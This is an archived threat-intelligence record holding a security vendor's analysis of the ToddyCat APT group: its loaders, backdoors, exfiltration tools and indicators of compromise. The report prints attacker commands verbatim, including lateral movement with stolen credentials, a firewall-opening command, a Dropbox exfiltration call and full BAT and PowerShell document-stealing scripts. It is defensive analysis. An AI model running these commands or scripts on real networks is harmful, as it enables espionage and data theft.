{
	"id": "877c8dbf-02fe-450c-ad29-9bd977cf964d",
	"created_at": "2026-04-06T00:07:36.947165Z",
	"updated_at": "2026-04-10T03:33:16.322289Z",
	"deleted_at": null,
	"sha1_hash": "b2b3cd4420f01a962c6e8eb84fdc704c174f3fd9",
	"title": "ToddyCat: Keep calm and check logs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 587764,
	"plain_text": "ToddyCat: Keep calm and check logs\r\nBy Giampaolo Dedola\r\nPublished: 2023-10-12 · Archived: 2026-04-05 14:07:37 UTC\r\nToddyCat is an advanced APT actor that we described in a previous publication last year. The group started its activities in\r\nDecember 2020 and has been responsible for multiple sets of attacks against high-profile entities in Europe and Asia.\r\nOur first publication was focused on their main tools, Ninja Trojan and Samurai Backdoor, and we also described the set of\r\nloaders used to launch them. We described how the attacker compromised publicly exposed servers using a vulnerability in\r\nMicrosoft Exchange, how they targeted desktops by sending malicious loaders, and how they guarantee their persistence\r\nusing a multi-stage loading scheme.\r\nDuring the last year, we discovered a new set of loaders developed from scratch and collected additional information about\r\ntheir post-exploitation activities. The discovered information allowed us to expand our knowledge of this group and obtain\r\nnew information about the attacker’s TTPs (Tactics, Techniques and Procedures). In this article, we’ll describe their new\r\ntoolset, the malware used to steal and exfiltrate data, and the techniques used by this group to move laterally and conduct\r\nespionage operations.\r\nStandard loaders\r\nThe loaders are 64-bit libraries that are invoked by rundll32.exe or side-loaded with legitimate and signed executable files.\r\nThese components are used during the infection phase to load the Ninja Trojan as a second stage. 
We’ve seen three variants\r\nof these new loaders:\r\nDifferences | Variant “Update” A | Variant “VLC” A | Variant “VLC” B\r\nLibrary loaded by | rundll32.exe | vlc.exe | vlc.exe\r\nMalicious code resides in | DllMain | libvlc_new | libvlc_new\r\nLoaded file | update.bin | playlist.dat | playlist.dat\r\nNext stage loaded in | Current process memory | Current process memory | Injected in new wusa.exe process memory\r\nNext stage | Library, which exports a function named “Start” | Library, which exports a function named “_” | Shellcode\r\nThe first variant was observed with a filename such as update.dll or x64.dll and it is usually loaded with the legitimate\r\nrundll32.exe Windows utility. Most of the malicious code resides in the DllMain, but the next stage is invoked with the\r\nexported function Start. The other two variants should be loaded with the legitimate VLC.exe media player, which is abused\r\nto sideload the malicious library.\r\nThe loader starts its activities by loading an encrypted payload from another file that should be present in the same directory.\r\nThe loaded data are then decoded using XOR, where the XOR key is generated using an unusual technique. The malware\r\nuses a static seed to generate a 256-byte XOR_KEY block using shuffle and add operations.\r\nhttps://securelist.com/toddycat-keep-calm-and-check-logs/110696/\r\nPage 1 of 17\n\nXOR_SEED: 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00\r\nThe resulting XOR_KEY block is shuffled again using another embedded 64-byte IDX block as an index to obtain a specific\r\n256-byte XOR key. 
The XOR key is used to decrypt the file contents and the resulting value is loaded in memory.\r\nVariants Update A and VLC A load the next stage in their process address space and the decrypted payload should be a\r\nlibrary that exports a function with a specific name: “Start” or “_” depending on the variant.\r\nVariant VLC B creates a new wusa.exe (Windows Update Standalone Installer) process, which is a legitimate Windows\r\nprogram located in the System32 directory. It then injects the decrypted payload into the remote process\r\naddress space and runs it using the CreateRemoteThread function.\r\nTailored loader\r\nDuring our investigation we noticed that on certain targets the attackers replaced the standard loaders with another variant\r\nthat we called a tailored loader because the encrypted file is tailored for the specific system.\r\nThe code is similar to the standard loader – variant VLC A. The main differences are the location and the filename of the\r\nencrypted file:\r\n%CommonApplicationData%\\Local\\user.key\r\nand the decryption scheme used to obtain the final payload.\r\nIt employs the same algorithm mentioned above, where an XOR_SEED is used to generate a 256-byte XOR_KEY block,\r\nwhich is then mixed using another embedded 64-byte IDX block. Before mixing the two blocks, the malware collects the\r\nPhysicalDrive0 storage properties to obtain the drive model.\r\nSnippet of code used to get storage properties\r\nIt also uses the GetVolumeNameForVolumeMountPointA function to retrieve the “C:\\” Volume GUID.\r\nSnippet of code used to get Volume GUID\r\nThe two values are used consecutively as the XOR key to modify the IDX block. This approach indicates that the encrypted\r\npayload stored in the user.key is tailored for the targeted system.\r\nBased on our observations, we believe the tailored loader is used to maintain long-term persistence. 
The technique used to\r\nachieve this goal is the same as that used by the threat actor’s Samurai backdoor, which allows the attacker to hide the\r\nmalware in the svchost.exe address space.\r\nIn this case, the attacker creates the following registry key:\r\nRegistry Key: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost\r\nValue name: fontcsvc\r\nValue: FontCacheSvc\r\nThis registry key is designed to force the legitimate svchost.exe process to load the FontCacheSvc service during system\r\nstartup. The command line of the process will look like this:\r\nC:\\Windows\\system32\\svchost.exe -k fontcsvc -s FontCacheSvc\r\nThe attacker also creates a new service that is configured to load the tailored loader, which is usually stored with filename\r\napibridge.dll.\r\nRegistry Key: $HKLM\\System\\ControlSet\\Services\\FontCacheSvc\\Parameters\r\nValue name: ServiceDll\r\nValue: %ProgramFiles%\\Common Files\\System\\apibridge.dll\r\nRegistry Key: $HKLM\\System\\ControlSet\\Services\\FontCacheSvc\\Parameters\r\nValue name: ServiceMain\r\nValue: Start\r\nNinja\r\nThe final stage loaded by the previously described components was the Ninja agent. This is sophisticated malware written in\r\nC++, probably part of an unknown post-exploitation toolkit developed by ToddyCat. We described it in our previous\r\npublication:\r\nThe agent is a powerful tool that provides various functionalities, including but not limited to:\r\nEnumeration and management of running processes;\r\nFile system management;\r\nManagement of multiple reverse shell sessions;\r\nInjection of code into arbitrary processes;\r\nLoading of additional modules (possibly plugins) during runtime;\r\nProxy functionality to forward TCP packets between the C2 and a remote host.\r\nThe latest version of the agent supports the same commands as described in the previous report, but with a different\r\nconfiguration. 
While the previous version obfuscated the embedded config with the XOR key 0xAA, the new version uses a\r\nNOT binary operation for the same purpose.\r\nAlthough the information contained in the config remains the same, the mutex name has been moved to after the HTTP\r\nheaders.\r\nLoFiSe\r\nThis is a component designed to find and collect files of interest on targeted systems. The name LoFiSe is derived from the\r\nmutex name used by this tool (‘MicrosoftLocalFileService’). The tool itself is a DLL file named DsNcDiag.dll that is\r\nlaunched using the DLL side-loading technique. The legitimate executable file with digital signature and original name\r\nnclauncher.exe from the software package Pulse Secure Network Connect 8.3 is used as a loader. The following paths and\r\nfile names are known on attacked systems:\r\nC:\\Program Files\\Windows Mail\\AcroRd64.exe\r\nC:\\Program Files\\Windows Mail\\DsNcDiag.dll\r\nC:\\Program Files\\Common Files\\VLCMedia\\VLCMediaUP.exe\r\nC:\\Program Files\\Common Files\\VLCMedia\\DsNcDiag.dll\r\nAfter the launch, LoFiSe starts to track the changes in the file system. All drives in the system are monitored. After a file\r\ncreation or modification event is received, the tool performs several checks. It filters out files that are larger than 6400000\r\nbytes (~6 MB) in size. Files from certain folders are also filtered out. 
These are all files that contain ProgramData in their full\r\npath, or the files that are already stored in the LoFiSe working directories.\r\nThe following are the working directories where the tool is known to store its files, depending on the version:\r\nC:\\Programdata\\Microsofts\\\r\nC:\\windows\\temp\\\r\nAt the next stage, the file extension is checked against the following masks:\r\n*.doc, *.docx, *.xls, *.xlsx, *.ppt, *.pptx, *.pdf, *.rtf, *.tif, *.odt, *.ods, *.odp, *.eml, *.msg\r\nIf the file has passed all the checks and is suitable for collection, LoFiSe calculates its MD5 hash, which it uses to check\r\npreviously copied files, and stores this information in the database. The database file, called Date.db in all known versions\r\nof the tool, is created in the working directory. Two tables are added to the database:\r\nFile paths in the database\r\nOther stored data\r\nIf the file’s MD5 is not in the table, the file is added to the working directory.\r\nEvery three hours, LoFiSe collects all the files from the working directory into a password-protected ZIP-archive and puts it\r\ninto a separate folder for further exfiltration:\r\nLogs generated when preparing the collected data\r\nDropBox uploader\r\nThis is a generic DropBox uploader that can be used by anyone to upload data to the popular file hosting service. The tool is\r\nprobably not exclusively used by ToddyCat, but we observed the group using it to exfiltrate stolen documents.\r\nThis small utility accepts a DropBox user access token as an argument. 
It then parses the current working directory and\r\nuploads files with the following extensions:\r\n.z;.001;.002;.003;.004;.005;.006;.007;.008;.009;.010;.011;.012;.013;.014;.015\r\nIn the course of our investigation, we identified several other similar samples, which were protected by different packers and\r\ndetected only in Southeast Asia. However, in some cases the tool was found on systems that were not obviously infected by\r\nToddyCat.\r\nPcexter\r\nThis is another uploader used to exfiltrate archive files to Microsoft OneDrive. This tool was distributed as a DLL file\r\nnamed Vspmsg.dll that was executed using the DLL side-loading technique. As a loader, the tool uses a legitimate executable\r\nfile from Visual Studio, VSPerfCmd, which is used to collect performance data. The known paths where these executables\r\nwere staged on attacked systems are:\r\nc:\\windows\\temp\\googledrivefs.exe\r\nC:\\windows\\temp\\vspmsg.dll\r\nc:\\program files\\windows mail\\securityhealthsystray64.exe\r\nc:\\program files\\windows mail\\vspmsg.dll\r\nc:\\program files\\common files\\vlcmedia\\vlcmediastatus.exe\r\nc:\\program files\\common files\\vlcmedia\\vspmsg.dll\r\nThis tool expects the following arguments:\r\nFlag Description\r\n–proxy Proxy address to be used via InternetOpenA\r\n—user, –pwd Proxy credentials\r\n-d The folder containing the files to upload\r\n–rex Mask with which the tool looks for files to send\r\nAfter the launch, Pcexter waits for the event “Global\\SystemLocalPcexter” to fire and then starts searching for files in the\r\nspecified directory using the given mask. 
This is the event that is set by the LoFiSe tool when it is creating the archive to\r\nsend.\r\nPcexter uses OneDrive OAuth 2.0 authorization, retrieves an access token and sends files via the POST method:\r\nMethod: POST\r\nURL: https://login.microsoftonline.com/common/oauth2/v2.0/token\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nExpect: 100-continue\r\nclient_id=\u003cclient_id\u003e\u0026scope=offline_access%20files.readwrite.all\r\nrefresh_token=\u003crefresh_token\u003e\u0026redirect_uri=https://login.microsoftonline.com/common/oauth2/nativeclient\u0026grant_type=refresh_token\r\nPassive UDP backdoor\r\nThis is a tiny passive backdoor that receives commands with UDP packets. The attacker usually executes the following\r\ncommand remotely via a task before executing this backdoor:\r\ncmd /c start /b netsh advfirewall firewall add rule name=\"SGAccessInboundRule\" dir=in protocol=udp action=allow localport=49683\r\nThis command creates a new firewall rule named SGAccessInboundRule on the targeted host. It allows the backdoor to\r\nreceive UDP packets on port 49683. After running this command, the attacker executes the backdoor:\r\nc:\\programdata\\microsoft\\network\\aspnet.exe 49683\r\nThe backdoor’s logic is simple: it binds a UDP socket to a specified port, decompresses the received data, and executes the\r\nresulting string using the WinExec function. Once the command is executed, the backdoor sends feedback about the\r\ncommand execution by returning a message that contains the current system time and the executed command. 
However, the\r\nbackdoor does not provide the output of the command.\r\nThe exact purpose of this backdoor is currently unknown, but it’s possible that it’s used to provide additional persistence in\r\ncase other implants are detected.\r\nCobaltStrike\r\nDuring our investigation, we observed the attacker using CobaltStrike before deploying the Ninja agent. Specifically, we\r\nobserved the use of a loader written in C++ and located at:\r\nC:\\ProgramData\\Microsoft\\mf\\windef.dll\r\nThe malware loads an embedded resource called “BIN”. The resource content is deobfuscated using an XOR algorithm and\r\na key embedded in the code: B0 9A E4 EA F7 BE B7 B0.\r\nThe resulting payload is the CobaltStrike beacon, configured to communicate with the following URL:\r\nhxxps://www.githubdd.workers[.]dev/fam/mfe?restart=false\r\nApproximately 10 minutes after the infection, ToddyCat Ninja was detected on the system.\r\nPost-exploitation\r\nThe latest discoveries confirm that ToddyCat attacks its target to perform espionage activities. To achieve this goal, the\r\nattacker penetrates corporate networks using tools such as the loaders and Trojans described above. 
Once it has gained a\r\nfoothold, it starts to collect information about the hosts connected to the same network to find targets that might have files of\r\ninterest.\r\nThe group performs discovery activities, enumerating domain accounts and DC servers by leveraging standard operating\r\nsystem administration utilities such as net and ping:\r\nnet group \"domain admins\" /dom\r\nnet user %USER% /dom\r\nnet group \"domain computers\" /dom | findstr %VALUABLE_USER%\r\nping %REMOTE_HOST% -4\r\nAfter identifying potential targets, the group moves laterally by locally mounting network shares using compromised\r\ndomain admin credentials:\r\nnet use \\\\%REMOTE_HOST%\\c$ \"%PASSWORD%\" /user:%USER%\r\nnet use \\\\%IP_ADDRESS%\\c$ \"%PASSWORD%\" /user:%USER%\r\nThe attackers take care to rotate the credentials used over time; the same credentials are unlikely to be used for a long time.\r\nAfter copying a script, a scheduled task is created, executed and immediately deleted along with the network share, all\r\ncyclically for each targeted host:\r\nschtasks /s %REMOTE_HOST% /tn %TASK_NAME% /u %DOMAIN%\\%USER% /p %PASSWORD% /create /ru system /sc DAILY /tr \"%COMMAND%\" /f\r\nschtasks /run /s %REMOTE_HOST% /tn %TASK_NAME% /u %USER% /p \"%PASSWORD%\" /i\r\nschtasks /delete /s %REMOTE_HOST% /tn %TASK_NAME% /u %USER% /p \"%PASSWORD%\" /f\r\nnet use \\\\%IP_ADDRESS%\\c$ /del /y\r\nThe scheduled task can typically contain a single discovery command, a binary call or a PS1 or BAT script that takes care of\r\nperforming the collection activity.\r\nDuring lateral movement, the output of single-command scheduled tasks is saved in a specific file so that it can be captured\r\nby the attacker who mounts the remote drive as a local share:\r\nGet process list\r\n\"cmd\" /c start /b tasklist /v \u003e\u003e c:\\users\\public\\d\r\nGet information about bootable drives\r\ncmd /c start /b powershell -c Get-WmiObject -Query {SELECT * FROM Win32_DiskPartition WHERE Bootable = TRUE} \u003e\u003e c:\\users\\public\\d\r\nGet remove drive model, vendor name and serial number\r\ncmd /c start /b wmic diskdrive where Name=\"\\\\.\\PHYSICALDRIVE0\" get model,name,SerialNumber \u003e\u003e c:\\users\\public\\d\r\nGet systeminfo\r\ncmd /c start /b systeminfo \u003e\u003e c:\\users\\public\\d\r\nCheck current TCP ports status\r\ncmd /c netstat -anop tcp \u003e\u003e c:\\users\\public\\d\r\nTest internet connection\r\ncmd /c ping 8.8.8.8 -n 2 \u003e\u003e c:\\users\\public\\d\r\nCheck if Kaspersky endpoint is running on remote host\r\ncmd /c wmic process where name=\"avp.exe\" get processid,executablepath,name,creationdate,CommandLine \u003e\u003e C:\\users\\public\\d\r\nIndicator removal\r\ncmd /c start /b del c:\\programdata\\intel\\%.SCRIPT_NAME%.ps1\r\nMoving to the root directory using impacket wmiexec\r\ncmd.exe /Q /c cd \\ 1\u003e \\\\127.0.0.1\\ADMIN$\\__%TIMESTAMP% 2\u003e\u00261\r\nIn the case of running a script, the commands are as follows. We then observed that the same PowerShell commands found\r\nin the PS1 script were wrapped in a BAT script, presumably to avoid detection.\r\nHowever, some folders seem to be favored over others:\r\ncmd /c start /b powershell.exe -exec bypass -c \"c:\\programdata\\intel\\%SCRIPT_NAME%.ps1\" %INTEGER%\r\nc:\\users\\public\\%SCRIPT_NAME%.bat\r\n\"cmd\" /c start /b powershell.exe -exec bypass \". 
\"c:\\users\\public\\%SCRIPT_NAME%.ps1\"\" \u003e c:\\users\\public\\d\r\nThe group reuses the same task names for the same session; such names are usually chosen to arouse less suspicion, such as\r\n“one” and “tpcd”, while script names can vary from two to four random keyboard-walking characters with higher entropy.\r\nAt the end of the activity, a temporary share is mounted and then deleted on the exfiltration host:\r\nnet share tmp=c:\\windows\\debug /grant:everyone,full\r\nnet share tmp /del /y\r\nData collection and exfiltration\r\nAs mentioned in the previous section, once the target of interest has been identified, the collection phase begins. The threat\r\nactor usually collects files from many different hosts and stores them in archives that are then exfiltrated from the targeted\r\nnetwork using public file storage services.\r\nData theft scheme\r\nWe have already described some tools, such as LoFiSe, specifically developed to identify and collect files of interest, but\r\nduring the investigation we also discovered other scripts used by ToddyCat to enumerate the files on the targeted host’s disks\r\nusing WMI and collect recently modified documents having .pdf, .doc, .docx, .xls and .xlsx extensions.\r\nIn these cases, compression is performed using tools such as 7zip or the RAR utility; the specific tools are likely chosen\r\nbased on what is already available within the infrastructure. Unlike LoFiSe, the collection scripts store the paths of the\r\nenumerated documents in a plain text TXT file. 
Document compression can be done directly on the target host or on the\r\nexfiltration host.\r\nBelow is the content of a BAT script that was run on the target hosts:\r\n@echo off\r\nmkdir c:\\users\\public\\tmp_ \u003enul 2\u003enul\r\npowershell.exe \"Get-Wmiobject -Class Win32_logicaldisk | where size -gt 0 | select-object -ExpandProperty DeviceID \u003e\u003e c:\\users\\public\\tmp_\\disk.txt\"\r\npowershell.exe \"get-content c:\\users\\public\\tmp_\\disk.txt | foreach {if ($_ -eq \\\"C:\\\"){dir \\users -Exclude \"tmp_\" | %%{dir $_.FullName -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt (Get-date).AddDays(-4) | %%{$_.FullName} \u003e\u003e c:\\users\\public\\tmp_\\ph.txt} } else{dir $_\\ -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt (Get-date).AddDays(-20) | %%{$_.FullName} \u003e\u003e c:\\users\\public\\tmp_\\ph.txt}}\"\r\npowershell.exe \"get-content c:\\users\\public\\tmp_\\ph.txt | copy-item -Destination c:\\users\\public\\tmp_ -Force -ErrorAction SilentlyContinue\" \u003enul 2\u003enul\r\nif EXIST C:\"\\Program Files\\\"WinRAR (\r\n    C:\"\\Program Files\\\"WinRAR\\rar.exe a -v200m c:\\users\\public\\tmp_.rar c:\\users\\public\\tmp_ -ep \u003enul 2\u003enul\r\n    rmdir /s /q c:\\users\\public\\tmp_\r\n) else if exist C:\"\\Program Files (x86)\\\"WinRAR (\r\n    C:\"\\Program Files (x86)\\\"WinRAR\\rar.exe a -v200m c:\\users\\public\\tmp_.rar c:\\users\\public\\tmp_ -ep \u003enul 2\u003enul\r\n    rmdir /s /q c:\\users\\public\\tmp_\r\n)\r\nexit\r\nIn the example above, the files were archived in a tmp_ folder; we also observed the use of a folder with a name\r\nparameterized according to the hostname, such as:\r\nThe documents to be collected are also selected based on their last writing time. 
Files are selected if their last modified date\r\nis more recent than a certain number of days ago. This number is usually passed as a script argument, but can also be hardcoded (as in the\r\nprevious example).\r\nThe collection script uses a different strategy when selecting data sources on primary and secondary drives. For a default\r\nWindows primary drive, the script traverses user profile directories (C:\\Users). This approach increases the likelihood of\r\ncapturing valuable data while reducing the processing time required and minimizing the chance of collecting unwanted files.\r\nWhen dealing with external devices and other non-primary storage media, the script opts for a more expedient strategy by\r\nselecting the root directory (\\). While the primary drive is always available, secondary drives may not always be accessible,\r\nrestricting collection opportunities. To mitigate this limitation, the threat actor occasionally expands the temporal range to\r\ninclude older files in its scope on secondary and removable drives (as can be noted in the BAT snippet).\r\nThe following is how the PS1 script is structured instead:\r\n[int] $res = 0\r\nif(!(($args.count -eq 1) -and ([int]::TryParse($args, [ref]$res)))){\r\n   exit\r\n}\r\n$lte = (Get-date).AddDays(-$res)\r\n$hostname = $env:computername + \"_\"\r\n$pt=Split-Path -Parent $MyInvocation.MyCommand.Definition\r\nif (!(Test-Path -path \"$env:tmp\\\\$hostname\")){\r\n   mkdir \"$env:tmp\\$hostname\"\r\n}\r\n$d = Get-Wmiobject -Class Win32_logicaldisk | where size -gt 0 | select-object -ExpandProperty DeviceID\r\nforeach($i in $d){\r\n   if ($i -eq \"C:\"){\r\n       $fp1 = dir c:\\\\users -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt $lte | sort LastWriteTime -Descending | %{$_.FullName}\r\n       write-output $fp1 \u003e\u003e \"$env:tmp\\$hostname\\path.txt\"\r\n       $fp1 | copy-item -Destination \"$env:tmp\\$hostname\" -Force -ErrorAction SilentlyContinue\r\n   } else{\r\n       $fp2 = dir $i\\ -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt $lte | sort LastWriteTime -Descending | %{$_.FullName}\r\n       write-output $fp2 \u003e\u003e \"$env:tmp\\$hostname\\path.txt\"\r\n       $fp2 | copy-item -Destination \"$env:tmp\\$hostname\" -Force -ErrorAction SilentlyContinue\r\n   }\r\n}\r\nC:'\\Program Files\\'WinRAR\\rar.exe a -v200m \"$env:tmp\\$hostname.rar\" \"$env:tmp\\$hostname\" -ep\r\nremove-item -path \"$env:tmp\\$hostname\" -Recurse\r\nmove-item -path \"$env:tmp\\$hostname.*\" \"$pt\" -Force -ErrorAction SilentlyContinue\r\nThe attackers try to evade defenses by protecting the scripts and distributing them with specific droppers that embed the\r\nscript code inside the PE “.text” section.\r\nPowerShell script inside the executable\r\nThe dropper receives two parameters; the first is a password string that must be provided to start the execution, and the\r\nsecond is a number that is actually transferred via the command line to the PS script. Once started, the dropper creates a file\r\nnamed pro.ps1 and executes it via PowerShell:\r\nc:\\users\\public\\mfc.exe letgo 3\r\npowershell.exe -windowstyle hidden -exec bypass \"c:\\users\\public\\pro.ps1\" 3\r\nIn other cases, we observed script variants designed solely to collect data and copy files to specific folders, but without\r\nincluding them in compressed archives. In these cases, the actor executed the script on the remote host using the standard\r\nremote task execution technique. 
The collected files were then manually transferred to the exfiltration host using the xcopy\r\nutility and finally compressed using the 7z binary:\r\nxcopy \\\\%hostname%\\c$\\programdata\\intel c:\\intel\\%hostname% /f /s /h\r\n7z64 a %hostname%.z %hostname% -v200m\r\nThe activity then continues with the actual exfiltration using one of the aforementioned tools, Pcexter or the Dropbox\r\nuploader:\r\ndb_org.exe %Dropbox Auth Bearer%\r\nToddyCat’s indicators of compromise\r\nLoaders\r\n97D0A47B595A20A3944919863A8163D1 Variant “Update”\r\n828F8B599A1CC4A02A2C3928EC3F5F8B Variant “VLC” A\r\n90B14807734045F1E0A47C40DF949AC4 Variant “VLC” B\r\n0F7002AACA8C1E71959C3EE635A85F14 Tailored loader\r\nD3050B3C7EE8A80D8D6700624626266D Tailored loader\r\nD4D8131ED03B71D58B1BA348F9606DF7 Tailored loader\r\nPassive UDP backdoor\r\n65AF75986577FCC14FBC5F98EFB3B47E\r\nDropbox exfiltrator\r\nBEBBEBA37667453003D2372103C45BBF\r\nLoFiSe\r\n14FF83A500D403A5ED990ED86296CCC7\r\n4AD609DDDF2C39CDA7BDBE2F9DC279FD\r\nPcexter\r\nD0CD88352638F1AE101C2A13356AB6B7\r\n318C16195F62094DADCC602B547BBE66\r\nDropper\r\nC170F05333041C56BCC39056FECB808F\r\nFile paths\r\nC:\\Program Files\\Windows Mail\\AcroRd64.exe LoFiSe Launcher\r\nC:\\Program Files\\Windows Mail\\DsNcDiag.dll LoFiSe\r\nC:\\Program Files\\Common Files\\VLCMedia\\VLCMediaUP.exe LoFiSe Launcher\r\nC:\\Program Files\\Common Files\\VLCMedia\\DsNcDiag.dll LoFiSe\r\nC:\\windows\\temp\\googledrivefs.exe Pcexter Launcher\r\nC:\\windows\\temp\\vspmsg.dll Pcexter\r\nc:\\program files\\windows mail\\securityhealthsystray64.exe Pcexter Launcher\r\nc:\\program files\\windows mail\\vspmsg.dll Pcexter\r\nc:\\program files\\common 
files\\vlcmedia\\vlcmediastatus.exe Pcexter Launcher\r\nc:\\program files\\common files\\vlcmedia\\vspmsg.dll Pcexter\r\nC:\\users\\public\\mfc.exe Dropper\r\nC:\\Windows\\System32\\up.dll Loader Simple Update\r\nC:\\Windows\\System32\\x64.dll Loader Simple Update\r\nC:\\Intel\\x64.dll Loader Simple Update\r\nC:\\Perflogs\\1.dll Loader Simple Update\r\nC:\\ibmsgtk\\x64.dll Loader Simple Update\r\nC:\\Windows\\Debug\\1.dll Loader Simple Update\r\nC:\\vlcmedia\\libvlc.dll Loader Simple VLC – wusa.exe inject\r\nC:\\restores\\libvlc.dll Loader Simple VLC\r\nC:\\Users\\%User%\\libvlc.dll Loader Simple VLC\r\nC:\\Windows\\System32\\libvlc.dll Loader Simple VLC\r\nC:\\Intel\\libvlc.dll Loader Simple VLC\r\nC:\\Program Files\\Common Files\\vlcmedia\\libvlc.dll Loader Simple VLC – wusa.exe inject\r\nC:\\Program Files\\Common Files\\System\\apibridge.dll Loader Tailored\r\nC:\\System\\apibridge.dll Loader Tailored\r\nc:\\windows\\debug\\aspnet.exe Passive UDP Backdoor\r\nC:\\Microsoft\\network\\aspnet.exe Passive UDP Backdoor\r\nC:\\ProgramData\\Microsoft\\Network\\aspnet.exe Passive UDP Backdoor\r\nc:\\windows\\debug\\svl.exe Passive UDP Backdoor – Not Persistent\r\nC:\\Intel\\db_org.exe DropBox Uploader\r\nC:\\Debug\\db_org.exe DropBox Uploader\r\nC:\\Users\\Public\\Downloads\\DB_SIMPLE.exe DropBox Uploader\r\nC:\\ProgramData\\db_org.exe DropBox Uploader\r\nC:\\ProgramData\\Microsoft\\XboxLive\\db_org.exe DropBox Uploader\r\nC:\\ProgramData\\VLCMedia\\playlist.dat Encrypted Payload\r\nC:\\Windows\\System32\\update.bin Encrypted Payload\r\nC:\\ibmsgtk\\update.bin Encrypted Payload\r\nC:\\Intel\\update.bin Encrypted Payload\r\nC:\\Windows\\Debug\\update.bin Encrypted Payload\r\nC:\\Perflogs\\update.bin Encrypted Payload\r\nC:\\Intel\\playlist.dat Encrypted Payload\r\nC:\\restores\\playlist.dat Encrypted Payload\r\nC:\\Windows\\System32\\playlist.dat Encrypted 
Payload\r\nC:\\ProgramData\\Local\\user.key Encrypted Payload\r\nDomains\r\nsolitary-dawn-61af.mfeagents.workers[.]dev Ninja C2\r\nwww.githubdd.workers[.]dev CobaltStrike C2\r\nURLs\r\nhxxps://solitary-dawn-61af.mfeagents.workers[.]dev/collector/3.0/ Ninja C2\r\nhxxps://www.githubdd.workers[.]dev/fam/mfe?restart=false CobaltStrike C2\r\nRegistry keys\r\n$HKLM\\System\\ControlSet\\Services\\FontCacheSvc\r\nMutexes\r\nMicrosoftLocalFileService\r\nEvents\r\nGlobal\\SystemLocalPcexter\r\nSource: https://securelist.com/toddycat-keep-calm-and-check-logs/110696/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://securelist.com/toddycat-keep-calm-and-check-logs/110696/"
	],
	"report_names": [
		"110696"
	],
	"threat_actors": [
		{
			"id": "d67df52c-a901-4d55-b287-321818500789",
			"created_at": "2024-04-24T02:00:49.591518Z",
			"updated_at": "2026-04-10T02:00:05.314272Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"ToddyCat"
			],
			"source_name": "MITRE:ToddyCat",
			"tools": [
				"Cobalt Strike",
				"LoFiSe",
				"China Chopper",
				"netstat",
				"Pcexter",
				"Samurai"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4c4e1108-8c11-48e3-91e3-95c24042f3a5",
			"created_at": "2022-10-25T16:07:24.329539Z",
			"updated_at": "2026-04-10T02:00:04.939013Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Operation Stayin’ Alive",
				"Storm-0247"
			],
			"source_name": "ETDA:ToddyCat",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"Cuthead",
				"FRP",
				"Fast Reverse Proxy",
				"Impacket",
				"Krong",
				"LoFiSe",
				"Ngrok",
				"PcExter",
				"PsExec",
				"SIMPOBOXSPY",
				"Samurai",
				"SinoChopper",
				"SoftEther VPN",
				"TomBerBil",
				"WAExp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "60d96824-1767-4b97-a6c7-7e9527458007",
			"created_at": "2023-01-06T13:46:39.378701Z",
			"updated_at": "2026-04-10T02:00:03.307846Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Websiic"
			],
			"source_name": "MISPGALAXY:ToddyCat",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434056,
	"ts_updated_at": 1775791996,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b2b3cd4420f01a962c6e8eb84fdc704c174f3fd9.pdf",
		"text": "https://archive.orkl.eu/b2b3cd4420f01a962c6e8eb84fdc704c174f3fd9.txt",
		"img": "https://archive.orkl.eu/b2b3cd4420f01a962c6e8eb84fdc704c174f3fd9.jpg"
	}
}